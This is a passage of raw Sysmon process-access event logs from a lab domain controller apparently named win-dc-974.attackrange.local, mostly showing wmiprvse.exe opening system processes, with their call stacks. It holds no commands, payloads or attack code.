16:52:52.762{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237418Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237417Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237416Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237415Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237414Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237413Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237412Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.747{05ADC7E1-229F-6039-1600-00000000AD01}154011112C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-81AA-00000000AD01}11880C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237411Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.747{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-81AA-00000000AD01}11880C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237410Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237409Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237408Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237407Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237406Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237405Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237404Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237403Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237402Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237401Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.747{05ADC7E1-6D64-603E-81AA-00000000AD01}118807916C:\Windows\system32\conhost.exe{05ADC7E1-6D64-603E-80AA-00000000AD01}5464C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237400Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237399Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237398Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.d